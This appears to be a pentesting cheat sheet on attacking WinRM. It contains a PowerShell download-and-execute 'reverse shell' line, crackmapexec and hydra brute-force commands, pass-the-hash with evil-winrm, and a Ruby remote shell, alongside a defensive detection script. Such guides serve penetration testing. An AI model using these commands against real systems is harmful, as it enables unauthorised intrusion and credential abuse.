# 5985,5986 - Pentesting WinRM
## WinRM

[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) is highlighted by Microsoft as a **protocol** that enables **remote management of Windows systems** over HTTP(S), using SOAP in the process. It is fundamentally backed by WMI and presents itself as an HTTP-based interface for WMI operations.

The presence of WinRM on a machine allows straightforward remote administration through PowerShell, similar to how SSH works on other operating systems. To determine whether WinRM is operational, check whether these ports are open:

* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**

An open port from the list above means WinRM has been set up, which allows attempts to start a remote session.

### **Initiating a WinRM session**

To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet sets the computer up to accept remote PowerShell commands. With elevated PowerShell access, the following commands enable this functionality and designate any host as trusted:

```powershell
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```

This approach adds a wildcard to the `trustedhosts` configuration, a step whose implications need careful consideration. Note also that it may be necessary to change the network type on the attacker's machine from "Public" to "Work".

In addition, WinRM can be **activated remotely** with the `wmic` command, as shown here:

```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```

This method allows WinRM to be set up remotely, which adds flexibility when managing Windows machines from a distance.

### Test if configured

To verify the setup from your attack machine, use the `Test-WSMan` command to check whether the target has WinRM configured properly. When you run it, you should expect to receive details about the protocol version and wsmid, indicating a successful configuration. The examples below show the expected output for a configured target versus an unconfigured one:

* For a target that **is** properly configured, the output will look similar to this:

```powershell
Test-WSMan <target>
```

The response should contain information about the protocol version and wsmid, showing that WinRM is set up correctly.

![](<../.gitbook/assets/image (582).png>)

* Conversely, for a target that is **not** configured for WinRM, no such details are returned, which points to the lack of a proper WinRM setup.

![](<../.gitbook/assets/image (458).png>)

### Execute a command

To execute `ipconfig` remotely on a target machine and view its output, run:

```powershell
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```

![](<../.gitbook/assets/image (151).png>)

You can also **execute a command from your current PS console** through _**Invoke-Command**_. Suppose you have a local function called _**enumeration**_ and you want to **execute it on a remote computer**. You can do:

```powershell
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```

### Execute a script

```powershell
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```

### Get a reverse shell

```powershell
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('')"}
```

### Get a PS session

To get an interactive PowerShell shell, use `Enter-PSSession`:

```powershell
# If you need to use different creds
$password = ConvertTo-SecureString 'Stud41Password@123' -AsPlainText -Force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds = New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName <computername> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName <computername> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in the background if it is stored in a variable (New-PSSession...)
```

![](<../.gitbook/assets/image (1009).png>)

**The session will run in a new process (wsmprovhost) inside the "victim"**

### **Forcing WinRM open**

To use PS Remoting and WinRM when the computer is not configured for it, you can enable it with:

```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```

### Saving and restoring sessions

This **will not work** if the **language** is **constrained** on the remote computer.

```powershell
# If you need to use different creds
$password = ConvertTo-SecureString 'Stud41Password@123' -AsPlainText -Force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds2 = New-Object System.Management.Automation.PSCredential(".\student41", $password)

# You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
# And restore it at any moment doing
Enter-PSSession -Session $sess1
```

Inside this session you can load PS scripts using _Invoke-Command_.

```powershell
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```

### Errors

If you find the following error:

`enter-pssession : Connecting to remote server failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.`

Try this on the client (information from [here](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):

```powershell
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
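From the defender's side, the points above (a remoting session runs under `wsmprovhost` on the target, and WinRM can be switched on remotely through `wmic` or PsExec) translate into process-lineage checks. The Python sketch below is an added example, not part of the original page; the record fields, rule names and sample events are constructed, and it assumes that `wmic process call create` spawns under `WmiPrvSE.exe` and PsExec under `PSEXESVC.exe`.

```python
import ntpath
import re

# Constructed process-creation records (fields modelled on Sysmon Event ID 1);
# hosts, users and the URL are made up for this example.
SAMPLE_EVENTS = [
    {"host": "SRV01", "user": r"CORP\alice", "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": "ipconfig /all"},
    {"host": "SRV01", "user": r"CORP\bob", "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": "cmd /c \"powershell -ep bypass iex (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')\""},
    {"host": "WS07", "user": r"CORP\bob", "parent": r"C:\Windows\PSEXESVC.exe",
     "cmdline": 'powershell.exe "enable-psremoting -force"'},
    {"host": "WS09", "user": r"CORP\svc", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell enable-psremoting -force"},
    {"host": "WS09", "user": r"CORP\carol", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

# Execution-policy bypass or an in-memory download, as in the page's one-liner.
CRADLE = re.compile(r"-e(p|xec\w*)\s+bypass|downloadstring\s*\(", re.I)
ENABLE = re.compile(r"enable-psremoting", re.I)
# Assumed parents for remotely created processes (WMI provider host, PsExec service).
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}

def classify(event):
    """Return the names of the rules that one process-creation event triggers."""
    parent = ntpath.basename(event["parent"]).lower()  # ntpath parses Windows paths on any OS
    hits = []
    if parent == "wsmprovhost.exe":
        hits.append("winrm_session_child")
    if CRADLE.search(event["cmdline"]):
        hits.append("download_cradle")
    if ENABLE.search(event["cmdline"]) and parent in REMOTE_EXEC_PARENTS:
        hits.append("remote_enable_psremoting")
    return hits

def triage(events):
    """Return (host, user, rules) for every event that matched at least one rule."""
    findings = []
    for event in events:
        rules = classify(event)
        if rules:
            findings.append((event["host"], event["user"], rules))
    return findings

if __name__ == "__main__":
    for host, user, rules in triage(SAMPLE_EVENTS):
        print(f"{host:6} {user:12} {', '.join(rules)}")
```

Legitimate administration also runs under `wsmprovhost`, so the first rule is better treated as a baseline to review per host and account than as an alert on its own.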
## Connecting to WinRM from Linux

### Brute force

Be careful, brute-forcing winrm could block users.

```bash
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```

### Using evil-winrm

```bash
gem install evil-winrm
```

Read the **documentation** on its GitHub: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)

```bash
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```

To connect to an **IPv6 address** with evil-winrm, create an entry in _**/etc/hosts**_ that maps a **domain name** to the IPv6 address, then connect to that domain name.

### Pass the hash with evil-winrm

```bash
evil-winrm -u <username> -H <Hash> -i <IP>
```

![](<../.gitbook/assets/image (680).png>)

### Using a PS-docker machine

```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName <IP> -Authentication Negotiate -Credential $creds
```

### Using a Ruby script

**Code taken from here:** [**https://alamot.github.io/winrm\_shell/**](https://alamot.github.io/winrm\_shell/)

```ruby
require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/

conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  :no_ssl_peer_verification => true
)

class String
  # Split on whitespace that is not inside quotes, then strip quotes and padding
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select {|s| not s.empty? }.
      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
  end
end

command = ""
file_manager = WinRM::FS::FileManager.new(conn)

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Print a prompt built from the remote user, host and current directory
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end
```

## Shodan

* `port:5985 Microsoft-HTTPAPI`

## References

* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)

## HackTricks Automatic Commands

```
Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number: 5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Management         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for WinRM
  Note: |
    Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

    sudo gem install winrm winrm-fs colorize stringio
    git clone https://github.com/Hackplayers/evil-winrm.git
    cd evil-winrm
    ruby evil-winrm.rb -i <IP> -u Administrator -p 'MySuperSecr3tPass123!'

    https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

    ruby evil-winrm.rb -i <IP> -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
    ^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
    menu
    invoke-binary `tab`

    #python3
    import winrm
    s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
    print(s.run_cmd('ipconfig'))
    print(s.run_ps('ipconfig'))

    https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```